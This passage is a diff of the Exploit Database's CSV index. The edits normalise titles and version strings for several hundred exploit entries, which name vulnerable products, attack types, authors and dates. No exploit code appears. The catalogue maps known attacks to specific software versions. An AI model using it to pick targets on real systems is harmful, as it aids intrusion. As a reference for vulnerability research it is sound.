30498,platforms/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,dos,0 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0 30500,platforms/windows/dos/30500.txt,"Yahoo! Messenger 8.1 KDU_V32M.DLL - Remote Denial of Service",2007-08-15,team509,windows,dos,0 -30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Include Vulnerabilities",2007-07-09,Crackers_Child,php,webapps,0 +30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion Vulnerabilities",2007-07-09,Crackers_Child,php,webapps,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Remote Privilege Escalation",2007-08-15,"John Heasman",java,remote,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Remote Privilege Escalation",2007-08-16,forloop,linux,local,0 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 Admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic TextFileSearch.ASP Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 -30506,platforms/hardware/dos/30506.txt,"Cisco IOS <= 12.3 Show IP BGP Regexp Remote Denial of Service",2007-08-17,anonymous,hardware,dos,0 +30506,platforms/hardware/dos/30506.txt,"Cisco IOS 12.3 Show IP BGP Regexp Remote Denial of Service",2007-08-17,anonymous,hardware,dos,0 30507,platforms/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 30508,platforms/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 -30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 Forumreply.php Local File Include",2007-08-20,DarKdewiL,php,webapps,0 -30510,platforms/php/webapps/30510.txt,"Firesoft Class_TPL.php Remote File Include",2007-08-20,DarKdewiL,php,webapps,0 +30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 Forumreply.php Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 +30510,platforms/php/webapps/30510.txt,"Firesoft Class_TPL.php Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 Uyeler2.php SQL Injection",2007-08-20,dumenci,php,webapps,0 30512,platforms/windows/dos/30512.txt,"Total Commander FileInfo 2.09 Plugin - Multiple PE File Denial of Service Vulnerabilities",2007-07-20,"Gynvael Coldwind",windows,dos,0 30513,platforms/multiple/dos/30513.txt,"Epic Games Unreal Engine Logging Function - Remote Denial of Service",2007-08-20,"Luigi Auriemma",multiple,dos,0 @@ -27416,7 +27416,7 @@ id,file,description,date,author,platform,type,port 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products - Local Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",multiple,remote,0 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 -30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 Index.php Remote File Include",2007-08-24,sm0k3,php,webapps,0 +30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 Index.php Remote File Inclusion",2007-08-24,sm0k3,php,webapps,0 30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS",2007-08-24,"Luigi Auriemma",multiple,dos,0 30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 @@ -27428,23 +27428,23 @@ id,file,description,date,author,platform,type,port 30534,platforms/php/webapps/30534.txt,"PhpGedView 4.1 Login.php Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 30535,platforms/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",linux,remote,0 30536,platforms/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",linux,remote,0 -30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,windows,remote,0 +30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,windows,remote,0 30538,platforms/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",hardware,dos,0 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 index.php Multiple SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 30540,platforms/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",multiple,dos,0 -30541,platforms/asp/webapps/30541.txt,"Cisco CallManager <= 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 +30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection",2007-08-29,anonymous,asp,webapps,0 30542,platforms/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos,0 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross-Site Scripting",2007-08-30,"Richard Brain",asp,webapps,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF",2013-12-28,"FIGHTERx war",hardware,webapps,0 -30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Include",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 +30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 -30872,platforms/php/webapps/30872.txt,"DomPHP <= 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 +30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 @@ -27454,22 +27454,22 @@ id,file,description,date,author,platform,type,port 30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.php SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 -31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 -31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include",2008-01-14,Smasher,cgi,webapps,0 +31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 +31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL XSS",2007-11-10,Doz,php,webapps,0 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 -30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include",2007-11-10,d3v1l,php,webapps,0 +30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 -30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 +30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 Cal2.JSP Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection",2007-09-04,SmOk3,asp,webapps,0 30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 30566,platforms/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos,0 30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 -30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 Index.php Local File Include",2007-09-06,mafialbano,php,webapps,0 +30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 Index.php Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 30569,platforms/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote,0 30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 Header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 @@ -27478,7 +27478,7 @@ id,file,description,date,author,platform,type,port 30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 text_search_action.php search_string Parameter XSS",2007-09-12,Doz,php,webapps,0 -30577,platforms/php/webapps/30577.txt,"SWSoft Plesk <= 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 +30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos,0 30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps,0 @@ -27490,7 +27490,7 @@ id,file,description,date,author,platform,type,port 32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal",2008-09-23,AlbaniaN-[H],asp,webapps,0 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting",2008-09-23,"Hadi Kiamarsi",php,webapps,0 32410,platforms/php/webapps/32410.txt,"6rbScript - 'cat.php' SQL Injection",2008-09-22,"Karar Alshami",php,webapps,0 -32389,platforms/php/webapps/32389.txt,"Quick Cart <= 3.1 - 'admin.php' Cross-Site Scripting",2008-09-17,"John Cobb",php,webapps,0 +32389,platforms/php/webapps/32389.txt,"Quick Cart 3.1 - 'admin.php' Cross-Site Scripting",2008-09-17,"John Cobb",php,webapps,0 32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps,0 32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS 'tienda.php' SQL Injection",2008-09-21,r45c4l,php,webapps,0 32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 @@ -27520,7 +27520,7 @@ id,file,description,date,author,platform,type,port 33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 -30582,platforms/windows/remote/30582.html,"WinSCP <= 4.0.3 URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 +30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30584,platforms/linux/dos/30584.py,"Boa 0.93.15 Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -27529,7 +27529,7 @@ id,file,description,date,author,platform,type,port 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 Command Execution",2007-09-17,anonymous,php,webapps,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field DoS",2007-09-17,j00ru//vx,windows,dos,0 -30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise <= 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 +30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 30593,platforms/windows/dos/30593.txt,"Microsoft MFC Library CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",windows,dos,0 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.x mode.php referer Parameter XSS",2007-09-17,L4teral,php,webapps,0 @@ -27546,13 +27546,13 @@ id,file,description,date,author,platform,type,port 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module Index.php SQL Injection",2007-09-24,"nights shadow",php,webapps,0 -30608,platforms/jsp/webapps/30608.txt,"JSPWiki <= 2.5.139 NewGroup.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30609,platforms/jsp/webapps/30609.txt,"JSPWiki <= 2.5.139 Edit.jsp edittime Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30610,platforms/jsp/webapps/30610.txt,"JSPWiki <= 2.5.139 Comment.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30611,platforms/jsp/webapps/30611.txt,"JSPWiki <= 2.5.139 UserPreferences.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30612,platforms/jsp/webapps/30612.txt,"JSPWiki <= 2.5.139 Login.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30613,platforms/jsp/webapps/30613.txt,"JSPWiki <= 2.5.139 Diff.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module Index.php Local File Include",2007-09-25,waraxe,php,webapps,0 +30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 NewGroup.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 Edit.jsp edittime Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 Comment.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 UserPreferences.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30612,platforms/jsp/webapps/30612.txt,"JSPWiki 2.5.139 Login.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 Diff.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module Index.php Local File Inclusion",2007-09-25,waraxe,php,webapps,0 30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 admin/ Default URI l_username Parameter XSS",2007-09-25,netVigilance,php,webapps,0 30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 admin/emoticonlist.php l_emoticonlist Parameter XSS",2007-09-25,netVigilance,php,webapps,0 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 admin/layout2b.php l_username Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 @@ -27572,7 +27572,7 @@ id,file,description,date,author,platform,type,port 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 Index.php Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x Index.php Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 -30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 postComment.php Remote File Include",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 +30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 @@ -27590,26 +27590,26 @@ id,file,description,date,author,platform,type,port 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 -30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include",2007-10-10,Cyber-Crime,php,webapps,0 -30652,platforms/hardware/remote/30652.txt,"Cisco IOS <= 12.3 LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 -30653,platforms/php/webapps/30653.txt,"phpMyAdmin <= 2.11.1 - Setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 +30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 +30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 +30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - Setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 Index.php Cross-Site Scripting",2007-10-11,durito,php,webapps,0 30655,platforms/php/webapps/30655.txt,"Joomla! 1.0.13 - Search Component SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 -30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 Index.php Local File Include",2007-10-11,iNs,php,webapps,0 +30656,platforms/php/webapps/30656.txt,"boastMachine 2.8 Index.php Local File Inclusion",2007-10-11,iNs,php,webapps,0 30657,platforms/php/webapps/30657.txt,"UMI CMS Index.php Cross-Site Scripting",2007-10-11,anonymous,php,webapps,0 -30658,platforms/php/webapps/30658.txt,"CRS Manager Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 +30658,platforms/php/webapps/30658.txt,"CRS Manager Multiple Remote File Inclusion Vulnerabilities",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 Index.php Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses Detail.php Multiple SQL Injection Vulnerabilities",2007-10-11,durito,php,webapps,0 30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 Report.CGI Authorization Bypass",2007-10-11,MustLive,cgi,webapps,0 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 Content Management System Main.php SQL Injection",2007-10-11,durito,php,webapps,0 -30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.php Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 +30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.php Multiple Remote File Inclusion Vulnerabilities",2007-10-11,iNs,php,webapps,0 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.php SQL Injection",2007-10-11,durito,php,webapps,0 30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE_ NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30669,platforms/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0 -30865,platforms/php/webapps/30865.txt,"DomPHP <= 0.83 - Local Directory Traversal",2014-01-12,Houssamix,php,webapps,0 +30865,platforms/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,php,webapps,0 30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 @@ -27625,15 +27625,15 @@ id,file,description,date,author,platform,type,port 30679,platforms/hardware/dos/30679.pl,"Nortel Networks Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Local Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Local Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 -30682,platforms/php/webapps/30682.txt,"SiteBar <= 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 -30683,platforms/php/webapps/30683.txt,"SiteBar <= 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 -30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 -30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 -30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 +30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 +30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 +30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 +30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 +30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps,0 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS 